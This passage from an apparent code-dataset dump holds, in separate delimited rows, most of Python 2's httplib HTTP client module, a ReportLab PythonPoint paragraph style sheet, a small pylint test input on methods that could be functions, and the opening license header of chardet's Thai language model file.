HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
# Mapping status codes to official W3C names
responses = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
class HTTPMessage(mimetools.Message):
def addheader(self, key, value):
"""Add header for field key handling repeats."""
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = ", ".join((prev, value))
self.dict[key] = combined
def addcontinue(self, key, more):
"""Add more field data from a continuation line."""
prev = self.dict[key]
self.dict[key] = prev + "\n " + more
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that terminates them.
The (normally blank) line that ends the headers is skipped, but not
included in the returned list. If a non-header line ends the headers,
(which is an error), an attempt is made to backspace over it; it is
never included in the returned list.
The variable self.status is set to the empty string if all went well,
otherwise it is an error message. The variable self.headers is a
completely uninterpreted list of lines contained in the header (so
printing them will reproduce the header exactly as it appears in the
file).
If multiple header fields with the same name occur, they are combined
according to the rules in RFC 2616 sec 4.2:
Appending each subsequent field-value to the first, each separated
by a comma. The order in which header fields with the same field-name
are received is significant to the interpretation of the combined
field value.
"""
# XXX The implementation overrides the readheaders() method of
# rfc822.Message. The base class design isn't amenable to
# customized behavior here so the method here is a copy of the
# base class code with a few small changes.
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline()
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# XXX Not sure if continuation lines are handled properly
# for http and/or for repeating headers
# It's a continuation line.
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
hlist.append(line)
self.addheader(headerseen, line[len(headerseen)+1:].strip())
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
class HTTPResponse:
# strict: If true, raise BadStatusLine if the status line can't be
# parsed as a valid HTTP/1.0 or 1.1 status line. By default it is
# false because it prevents clients from talking to HTTP/0.9
# servers. Note that a response with a sufficiently corrupted
# status line will look like an HTTP/0.9 response.
# See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.
def __init__(self, sock, debuglevel=0, strict=0, method=None):
self.fp = sock.makefile('rb', 0)
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def _read_status(self):
# Initialize with Simple-Response defaults
line = self.fp.readline()
if self.debuglevel > 0:
print "reply:", repr(line)
if not line:
# Presumably, the server closed the connection before
# sending a valid response.
raise BadStatusLine(line)
try:
[version, status, reason] = line.split(None, 2)
except ValueError:
try:
[version, status] = line.split(None, 1)
reason = ""
except ValueError:
# empty version will cause next test to fail and status
# will be treated as 0.9 response.
version = ""
if not version.startswith('HTTP/'):
if self.strict:
self.close()
raise BadStatusLine(line)
else:
# assume it's a Simple-Response from an 0.9 server
self.fp = LineAndFileWrapper(line, self.fp)
return "HTTP/0.9", 200, ""
# The status code is a three-digit number
try:
status = int(status)
if status < 100 or status > 999:
raise BadStatusLine(line)
except ValueError:
raise BadStatusLine(line)
return version, status, reason
def begin(self):
if self.msg is not None:
# we've already started reading the response
return
# read until we get a non-100 response
while True:
version, status, reason = self._read_status()
if status != CONTINUE:
break
# skip the header from the 100 response
while True:
skip = self.fp.readline().strip()
if not skip:
break
if self.debuglevel > 0:
print "header:", skip
self.status = status
self.reason = reason.strip()
if version == 'HTTP/1.0':
self.version = 10
elif version.startswith('HTTP/1.'):
self.version = 11 # use HTTP/1.1 code for HTTP/1.x where x>=1
elif version == 'HTTP/0.9':
self.version = 9
else:
raise UnknownProtocol(version)
if self.version == 9:
self.length = None
self.chunked = 0
self.will_close = 1
self.msg = HTTPMessage(StringIO())
return
self.msg = HTTPMessage(self.fp, 0)
if self.debuglevel > 0:
for hdr in self.msg.headers:
print "header:", hdr,
# don't let the msg keep an fp
self.msg.fp = None
# are we using the chunked-style of transfer encoding?
tr_enc = self.msg.getheader('transfer-encoding')
if tr_enc and tr_enc.lower() == "chunked":
self.chunked = 1
self.chunk_left = None
else:
self.chunked = 0
# will the connection close at the end of the response?
self.will_close = self._check_close()
# do we have a Content-Length?
# NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
length = self.msg.getheader('content-length')
if length and not self.chunked:
try:
self.length = int(length)
except ValueError:
self.length = None
else:
if self.length < 0: # ignore nonsensical negative lengths
self.length = None
else:
self.length = None
# does the body have a fixed length? (of zero)
if (status == NO_CONTENT or status == NOT_MODIFIED or
100 <= status < 200 or # 1xx codes
self._method == 'HEAD'):
self.length = 0
# if the connection remains open, and we aren't using chunked, and
# a content-length was not provided, then assume that the connection
# WILL close.
if not self.will_close and \
not self.chunked and \
self.length is None:
self.will_close = 1
def _check_close(self):
conn = self.msg.getheader('connection')
if self.version == 11:
# An HTTP/1.1 proxy is assumed to stay open unless
# explicitly closed.
conn = self.msg.getheader('connection')
if conn and "close" in conn.lower():
return True
return False
# Some HTTP/1.0 implementations have support for persistent
# connections, using rules different than HTTP/1.1.
# For older HTTP, Keep-Alive indicates persistent connection.
if self.msg.getheader('keep-alive'):
return False
# At least Akamai returns a "Connection: Keep-Alive" header,
# which was supposed to be sent by the client.
if conn and "keep-alive" in conn.lower():
return False
# Proxy-Connection is a netscape hack.
pconn = self.msg.getheader('proxy-connection')
if pconn and "keep-alive" in pconn.lower():
return False
# otherwise, assume it will close
return True
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def isclosed(self):
# NOTE: it is possible that we will not ever call self.close(). This
# case occurs when will_close is TRUE, length is None, and we
# read up to the last byte, but NOT past it.
#
# IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
# called, meaning self.isclosed() is meaningful.
return self.fp is None
# XXX It would be nice to have readline and __iter__ for this, too.
def read(self, amt=None):
if self.fp is None:
return ''
if self.chunked:
return self._read_chunked(amt)
if amt is None:
# unbounded read
if self.length is None:
s = self.fp.read()
else:
s = self._safe_read(self.length)
self.length = 0
self.close() # we read everything
return s
if self.length is not None:
if amt > self.length:
# clip the read to the "end of response"
amt = self.length
# we do not use _safe_read() here because this may be a .will_close
# connection, and the user is reading more bytes than will be provided
# (for example, reading in 1k chunks)
s = self.fp.read(amt)
if self.length is not None:
self.length -= len(s)
if not self.length:
self.close()
return s
def _read_chunked(self, amt):
assert self.chunked != _UNKNOWN
chunk_left = self.chunk_left
value = ''
# XXX This accumulates chunks by repeated string concatenation,
# which is not efficient as the number or size of chunks gets big.
while True:
if chunk_left is None:
line = self.fp.readline()
i = line.find(';')
if i >= 0:
line = line[:i] # strip chunk-extensions
try:
chunk_left = int(line, 16)
except ValueError:
# close the connection as protocol synchronisation is
# probably lost
self.close()
raise IncompleteRead(value)
if chunk_left == 0:
break
if amt is None:
value += self._safe_read(chunk_left)
elif amt < chunk_left:
value += self._safe_read(amt)
self.chunk_left = chunk_left - amt
return value
elif amt == chunk_left:
value += self._safe_read(amt)
self._safe_read(2) # toss the CRLF at the end of the chunk
self.chunk_left = None
return value
else:
value += self._safe_read(chunk_left)
amt -= chunk_left
# we read the whole chunk, get another
self._safe_read(2) # toss the CRLF at the end of the chunk
chunk_left = None
# read and discard trailer up to the CRLF terminator
### note: we shouldn't have any trailers!
while True:
line = self.fp.readline()
if not line:
# a vanishingly small number of sites EOF without
# sending the trailer
break
if line == '\r\n':
break
# we read everything; close the "file"
self.close()
return value
def _safe_read(self, amt):
"""Read the number of bytes requested, compensating for partial reads.
Normally, we have a blocking socket, but a read() can be interrupted
by a signal (resulting in a partial read).
Note that we cannot distinguish between EOF and an interrupt when zero
bytes have been read. IncompleteRead() will be raised in this
situation.
This function should be used when <amt> bytes "should" be present for
reading. If the bytes are truly not available (due to EOF), then the
IncompleteRead exception can be used to detect the problem.
"""
s = []
while amt > 0:
chunk = self.fp.read(min(amt, MAXAMOUNT))
if not chunk:
raise IncompleteRead(s)
s.append(chunk)
amt -= len(chunk)
return ''.join(s)
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection:
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
def __init__(self, host, port=None, strict=None,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
self.timeout = timeout
self.sock = None
self._buffer = []
self.__response = None
self.__state = _CS_IDLE
self._method = None
self._set_hostport(host, port)
if strict is not None:
self.strict = strict
def _set_hostport(self, host, port):
if port is None:
i = host.rfind(':')
j = host.rfind(']') # ipv6 addresses have [...]
if i > j:
try:
port = int(host[i+1:])
except ValueError:
raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
host = host[:i]
else:
port = self.default_port
if host and host[0] == '[' and host[-1] == ']':
host = host[1:-1]
self.host = host
self.port = port
def set_debuglevel(self, level):
self.debuglevel = level
def connect(self):
"""Connect to the host and port specified in __init__."""
self.sock = socket.create_connection((self.host,self.port),
self.timeout)
def close(self):
"""Close the connection to the HTTP server."""
if self.sock:
self.sock.close() # close it manually... there may be other refs
self.sock = None
if self.__response:
self.__response.close()
self.__response = None
self.__state = _CS_IDLE
def send(self, str):
"""Send `str' to the server."""
if self.sock is None:
if self.auto_open:
self.connect()
else:
raise NotConnected()
# send the data to the server. if we get a broken pipe, then close
# the socket. we want to reconnect when somebody tries to send again.
#
# NOTE: we DO propagate the error, though, because we cannot simply
# ignore the error... the caller will know if they can retry.
if self.debuglevel > 0:
print "send:", repr(str)
try:
blocksize=8192
if hasattr(str,'read') :
if self.debuglevel > 0: print "sendIng a read()able"
data=str.read(blocksize)
while data:
self.sock.sendall(data)
data=str.read(blocksize)
else:
self.sock.sendall(str)
except socket.error, v:
if v[0] == 32: # Broken pipe
self.close()
raise
def _output(self, s):
"""Add a line of output to the current request buffer.
Assumes that the line does *not* end with \\r\\n.
"""
self._buffer.append(s)
def _send_output(self):
"""Send the currently buffered request and clear the buffer.
Appends an extra \\r\\n to the buffer.
"""
self._buffer.extend(("", ""))
msg = "\r\n".join(self._buffer)
del self._buffer[:]
self.send(msg)
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
"""
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
# in certain cases, we cannot issue another request on this connection.
# this occurs when:
# 1) we are in the process of sending a request. (_CS_REQ_STARTED)
# 2) a response to a previous request has signalled that it is going
# to close the connection upon completion.
# 3) the headers for the previous response have not been read, thus
# we cannot determine whether point (2) is true. (_CS_REQ_SENT)
#
# if there is no prior response, then we can request at will.
#
# if point (2) is true, then we will have passed the socket to the
# response (effectively meaning, "there is no prior response"), and
# will open a new one when a new request is made.
#
# Note: if a prior response exists, then we *can* start a new request.
# We are not allowed to begin fetching the response to this new
# request, however, until that prior response is complete.
#
if self.__state == _CS_IDLE:
self.__state = _CS_REQ_STARTED
else:
raise CannotSendRequest()
# Save the method we use, we need it later in the response phase
self._method = method
if not url:
url = '/'
str = '%s %s %s' % (method, url, self._http_vsn_str)
self._output(str)
if self._http_vsn == 11:
# Issue some standard headers for better HTTP/1.1 compliance
if not skip_host:
# this header is issued *only* for HTTP/1.1
# connections. more specifically, this means it is
# only issued when the client uses the new
# HTTPConnection() class. backwards-compat clients
# will be using HTTP/1.0 and those clients may be
# issuing this header themselves. we should NOT issue
# it twice; some web servers (such as Apache) barf
# when they see two Host: headers
# If we need a non-standard port,include it in the
# header. If the request is going through a proxy,
# but the host of the actual URL, not the host of the
# proxy.
netloc = ''
if url.startswith('http'):
nil, netloc, nil, nil, nil = urlsplit(url)
if netloc:
try:
netloc_enc = netloc.encode("ascii")
except UnicodeEncodeError:
netloc_enc = netloc.encode("idna")
self.putheader('Host', netloc_enc)
else:
try:
host_enc = self.host.encode("ascii")
except UnicodeEncodeError:
host_enc = self.host.encode("idna")
if self.port == self.default_port:
self.putheader('Host', host_enc)
else:
self.putheader('Host', "%s:%s" % (host_enc, self.port))
# note: we are assuming that clients will not attempt to set these
# headers since *this* library must deal with the
# consequences. this also means that when the supporting
# libraries are updated to recognize other forms, then this
# code should be changed (removed or updated).
# we only want a Content-Encoding of "identity" since we don't
# support encodings such as x-gzip or x-deflate.
if not skip_accept_encoding:
self.putheader('Accept-Encoding', 'identity')
# we can accept "chunked" Transfer-Encodings, but no others
# NOTE: no TE header implies *only* "chunked"
#self.putheader('TE', 'chunked')
# if TE is supplied in the header, then it must appear in a
# Connection header.
#self.putheader('Connection', 'TE')
else:
# For HTTP/1.0, the server will assume "not chunked"
pass
def putheader(self, header, value):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
if self.__state != _CS_REQ_STARTED:
raise CannotSendHeader()
str = '%s: %s' % (header, value)
self._output(str)
def endheaders(self):
"""Indicate that the last header line has been sent to the server."""
if self.__state == _CS_REQ_STARTED:
self.__state = _CS_REQ_SENT
else:
raise CannotSendHeader()
self._send_output()
def request(self, method, url, body=None, headers={}):
"""Send a complete request to the server."""
try:
self._send_request(method, url, body, headers)
except socket.error, v:
# trap 'Broken pipe' if we're allowed to automatically reconnect
if v[0] != 32 or not self.auto_open:
raise
# try one more time
self._send_request(method, url, body, headers)
def _send_request(self, method, url, body, headers):
# honour explicitly requested Host: and Accept-Encoding headers
header_names = dict.fromkeys([k.lower() for k in headers])
skips = {}
if 'host' in header_names:
skips['skip_host'] = 1
if 'accept-encoding' in header_names:
skips['skip_accept_encoding'] = 1
self.putrequest(method, url, **skips)
if body and ('content-length' not in header_names):
thelen=None
try:
thelen=str(len(body))
except TypeError, te:
# If this is a file-like object, try to
# fstat its file descriptor
import os
try:
thelen = str(os.fstat(body.fileno()).st_size)
except (AttributeError, OSError):
# Don't send a length if this failed
if self.debuglevel > 0: print "Cannot stat!!"
if thelen is not None:
self.putheader('Content-Length',thelen)
for hdr, value in headers.iteritems():
self.putheader(hdr, value)
self.endheaders()
if body:
self.send(body)
def getresponse(self):
"Get the response from the server."
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
#
# if a prior response exists, then it must be completed (otherwise, we
# cannot read this response's header to determine the connection-close
# behavior)
#
# note: if a prior response existed, but was connection-close, then the
# socket and response were made independent of this HTTPConnection
# object since a new request requires that we open a whole new
# connection
#
# this means the prior response had one of two states:
# 1) will_close: this connection was reset and the prior socket and
# response operate independently
# 2) persistent: the response was retained and we await its
# isclosed() status to become true.
#
if self.__state != _CS_REQ_SENT or self.__response:
raise ResponseNotReady()
if self.debuglevel > 0:
response = self.response_class(self.sock, self.debuglevel,
strict=self.strict,
method=self._method)
else:
response = self.response_class(self.sock, strict=self.strict,
method=self._method)
response.begin()
assert response.will_close != _UNKNOWN
self.__state = _CS_IDLE
if response.will_close:
# this effectively passes the connection to the response
self.close()
else:
# remember this, so we can tell when it is complete
self.__response = response
return response
class HTTP:
"Compatibility class with httplib.py from 1.5."
_http_vsn = 10
_http_vsn_str = 'HTTP/1.0'
debuglevel = 0
_connection_class = HTTPConnection
def __init__(self, host='', port=None, strict=None):
"Provide a default host, since the superclass requires one."
# some joker passed 0 explicitly, meaning default port
if port == 0:
port = None
# Note that we may pass an empty string as the host; this will throw
# an error when we attempt to connect. Presumably, the client code
# will call connect before then, with a proper host.
self._setup(self._connection_class(host, port, strict))
def _setup(self, conn):
self._conn = conn
# set up delegation to flesh out interface
self.send = conn.send
self.putrequest = conn.putrequest
self.endheaders = conn.endheaders
self.set_debuglevel = conn.set_debuglevel
conn._http_vsn = self._http_vsn
conn._http_vsn_str = self._http_vsn_str
self.file = None
def connect(self, host=None, port=None):
"Accept arguments to set the host/port, since the superclass doesn't."
if host is not None:
self._conn._set_hostport(host, port)
self._conn.connect()
def getfile(self):
"Provide a getfile, since the superclass' does not use this concept."
return self.file
def putheader(self, header, *values):
"The superclass allows only one value argument."
self._conn.putheader(header, '\r\n\t'.join(values))
def getreply(self):
"""Compat definition since superclass does not define it.
Returns a tuple consisting of:
- server status code (e.g. '200' if all goes well)
- server "reason" corresponding to status code
- any RFC822 headers in the response from the server
"""
try:
response = self._conn.getresponse()
except BadStatusLine, e:
### hmm. if getresponse() ever closes the socket on a bad request,
### then we are going to have problems with self.sock
### should we keep this behavior? do people use it?
# keep the socket open (as a file), and return it
self.file = self._conn.sock.makefile('rb', 0)
# close our socket -- we want to restart after any protocol error
self.close()
self.headers = None
return -1, e.line, None
self.headers = response.msg
self.file = response.fp
return response.status, response.reason, response.msg
def close(self):
self._conn.close()
# note that self.file == response.fp, which gets closed by the
# superclass. just clear the object ref here.
### hmm. messy. if status==-1, then self.file is owned by us.
### well... we aren't explicitly closing, but losing this ref will
### do it
self.file = None
try:
import ssl
except ImportError:
pass
else:
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
default_port = HTTPS_PORT
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
HTTPConnection.__init__(self, host, port, strict, timeout)
self.key_file = key_file
self.cert_file = cert_file
def connect(self):
"Connect to a host on a given (SSL) port."
sock = socket.create_connection((self.host, self.port), self.timeout)
self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
__all__.append("HTTPSConnection")
class HTTPS(HTTP):
"""Compatibility with 1.5 httplib interface
Python 1.5.2 did not have an HTTPS class, but it defined an
interface for sending http requests that is also useful for
https.
"""
_connection_class = HTTPSConnection
def __init__(self, host='', port=None, key_file=None, cert_file=None,
strict=None):
# provide a default host, pass the X509 cert info
# urf. compensate for bad input.
if port == 0:
port = None
self._setup(self._connection_class(host, port, key_file,
cert_file, strict))
# we never actually use these for anything, but we keep them
# here for compatibility with post-1.5.2 CVS.
self.key_file = key_file
self.cert_file = cert_file
def FakeSocket (sock, sslobj):
warnings.warn("FakeSocket is deprecated, and won't be in 3.x. " +
"Use the result of ssl.wrap_socket() directly instead.",
DeprecationWarning, stacklevel=2)
return sslobj
class HTTPException(Exception):
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
pass
class InvalidURL(HTTPException):
pass
class UnknownProtocol(HTTPException):
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
pass
class UnimplementedFileMode(HTTPException):
pass
class IncompleteRead(HTTPException):
def __init__(self, partial):
self.args = partial,
self.partial = partial
class ImproperConnectionState(HTTPException):
pass
class CannotSendRequest(ImproperConnectionState):
pass
class CannotSendHeader(ImproperConnectionState):
pass
class ResponseNotReady(ImproperConnectionState):
pass
class BadStatusLine(HTTPException):
def __init__(self, line):
self.args = line,
self.line = line
# for backwards compatibility
error = HTTPException
class LineAndFileWrapper:
"""A limited file-like object for HTTP/0.9 responses."""
# The status-line parsing code calls readline(), which normally
# get the HTTP status line. For a 0.9 response, however, this is
# actually the first line of the body! Clients need to get a
# readable file object that contains that line.
def __init__(self, line, file):
self._line = line
self._file = file
self._line_consumed = 0
self._line_offset = 0
self._line_left = len(line)
def __getattr__(self, attr):
return getattr(self._file, attr)
def _done(self):
# called when the last byte is read from the line. After the
# call, all read methods are delegated to the underlying file
# object.
self._line_consumed = 1
self.read = self._file.read
self.readline = self._file.readline
self.readlines = self._file.readlines
def read(self, amt=None):
if self._line_consumed:
return self._file.read(amt)
assert self._line_left
if amt is None or amt > self._line_left:
s = self._line[self._line_offset:]
self._done()
if amt is None:
return s + self._file.read()
else:
return s + self._file.read(amt - len(s))
else:
assert amt <= self._line_left
i = self._line_offset
j = i + amt
s = self._line[i:j]
self._line_offset = j
self._line_left -= amt
if self._line_left == 0:
self._done()
return s
def readline(self):
if self._line_consumed:
return self._file.readline()
assert self._line_left
s = self._line[self._line_offset:]
self._done()
return s
def readlines(self, size=None):
if self._line_consumed:
return self._file.readlines(size)
assert self._line_left
L = [self._line[self._line_offset:]]
self._done()
if size is None:
return L + self._file.readlines()
else:
return L + self._file.readlines(size)
def test():
"""Test this module.
A hodge podge of tests collected here, because they have too many
external dependencies for the regular test suite.
"""
import sys
import getopt
opts, args = getopt.getopt(sys.argv[1:], 'd')
dl = 0
for o, a in opts:
if o == '-d': dl = dl + 1
host = 'www.python.org'
selector = '/'
if args[0:]: host = args[0]
if args[1:]: selector = args[1]
h = HTTP()
h.set_debuglevel(dl)
h.connect(host)
h.putrequest('GET', selector)
h.endheaders()
status, reason, headers = h.getreply()
print 'status =', status
print 'reason =', reason
print "read", len(h.getfile().read())
print
if headers:
for header in headers.headers: print header.strip()
print
# minimal test that code to extract host from url works
class HTTP11(HTTP):
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
h = HTTP11('www.python.org')
h.putrequest('GET', 'http://www.python.org/~jeremy/')
h.endheaders()
h.getreply()
h.close()
try:
import ssl
except ImportError:
pass
else:
for host, selector in (('sourceforge.net', '/projects/python'),
):
print "https://%s%s" % (host, selector)
hs = HTTPS()
hs.set_debuglevel(dl)
hs.connect(host)
hs.putrequest('GET', selector)
hs.endheaders()
status, reason, headers = hs.getreply()
print 'status =', status
print 'reason =', reason
print "read", len(hs.getfile().read())
print
if headers:
for header in headers.headers: print header.strip()
print
if __name__ == '__main__':
test()
| apache-2.0 |
nickpack/reportlab | tools/pythonpoint/styles/projection.py | 1 | 3319 | """This is an example style sheet. You can create your own, and
have them loaded by the presentation. A style sheet is just a
dictionary, where they keys are style names and the values are
ParagraphStyle objects.
You must provide a function called "getParagraphStyles()" to
return it. In future, we can put things like LineStyles,
TableCellStyles etc. in the same modules.
You might wish to have two parallel style sheets, one for colour
and one for black and white, so you can switch your presentations
easily.
A style sheet MUST define a style called 'Normal'.
"""
from reportlab.lib import styles
from reportlab.lib.colors import *
from reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT, TA_JUSTIFY
def getParagraphStyles():
"""Returns a dictionary of styles based on Helvetica"""
stylesheet = {}
ParagraphStyle = styles.ParagraphStyle
para = ParagraphStyle('Normal', None) #the ancestor of all
para.fontName = 'Helvetica-Bold'
para.fontSize = 24
para.leading = 28
para.textColor = white
stylesheet['Normal'] = para
para = ParagraphStyle('BodyText', stylesheet['Normal'])
para.spaceBefore = 12
stylesheet['BodyText'] = para
para = ParagraphStyle('BigCentered', stylesheet['Normal'])
para.spaceBefore = 12
para.alignment = TA_CENTER
stylesheet['BigCentered'] = para
para = ParagraphStyle('Italic', stylesheet['BodyText'])
para.fontName = 'Helvetica-Oblique'
para.textColor = white
stylesheet['Italic'] = para
para = ParagraphStyle('Title', stylesheet['Normal'])
para.fontName = 'Helvetica'
para.fontSize = 48
para.Leading = 58
para.spaceAfter = 36
para.alignment = TA_CENTER
stylesheet['Title'] = para
para = ParagraphStyle('Heading1', stylesheet['Normal'])
para.fontName = 'Helvetica-Bold'
para.fontSize = 48# 36
para.leading = 44
para.spaceAfter = 36
para.textColor = green
para.alignment = TA_LEFT
stylesheet['Heading1'] = para
para = ParagraphStyle('Heading2', stylesheet['Normal'])
para.fontName = 'Helvetica-Bold'
para.fontSize = 28
para.leading = 34
para.spaceBefore = 24
para.spaceAfter = 12
stylesheet['Heading2'] = para
para = ParagraphStyle('Heading3', stylesheet['Normal'])
para.fontName = 'Helvetica-BoldOblique'
para.spaceBefore = 24
para.spaceAfter = 12
stylesheet['Heading3'] = para
para = ParagraphStyle('Bullet', stylesheet['Normal'])
para.firstLineIndent = -18
para.leftIndent = 72
para.spaceBefore = 6
para.bulletFontName = 'Symbol'
para.bulletFontSize = 24
para.bulletIndent = 36
stylesheet['Bullet'] = para
para = ParagraphStyle('Definition', stylesheet['Normal'])
#use this for definition lists
para.firstLineIndent = 0
para.leftIndent = 72
para.bulletIndent = 0
para.spaceBefore = 12
para.bulletFontName = 'Helvetica-BoldOblique'
stylesheet['Definition'] = para
para = ParagraphStyle('Code', stylesheet['Normal'])
para.fontName = 'Courier-Bold'
para.fontSize = 16
para.leading = 18
para.leftIndent = 36
para.textColor = chartreuse
stylesheet['Code'] = para
return stylesheet | bsd-3-clause |
gkarlin/django-jenkins | build/pylint/test/input/func_method_could_be_function.py | 1 | 1339 | # pylint: disable=R0903,R0922,W0232,R0924
"""test detection of method which could be a function"""
__revision__ = None
class Toto(object):
"""bla bal abl"""
def __init__(self):
self.aaa = 2
def regular_method(self):
"""this method is a real method since it access to self"""
self.function_method()
def function_method(self):
"""this method isn' a real method since it doesn't need self"""
print 'hello'
class Base:
"""an abstract class"""
def __init__(self):
self.aaa = 2
def check(self, arg):
"""an abstract method, could not be a function"""
raise NotImplementedError
class Sub(Base):
"""a concret class"""
def check(self, arg):
"""a concret method, could not be a function since it need
polymorphism benefits
"""
return arg == 0
class Super:
"""same as before without abstract"""
x = 1
def method(self):
"""regular"""
print self.x
class Sub1(Super):
"""override method with need for self"""
def method(self):
"""no i can not be a function"""
print 42
def __len__(self):
"""no i can not be a function"""
print 42
def __cmp__(self, other):
"""no i can not be a function"""
print 42
| lgpl-3.0 |
gauribhoite/personfinder | rtd/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langthaimodel.py | 2930 | 11275 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
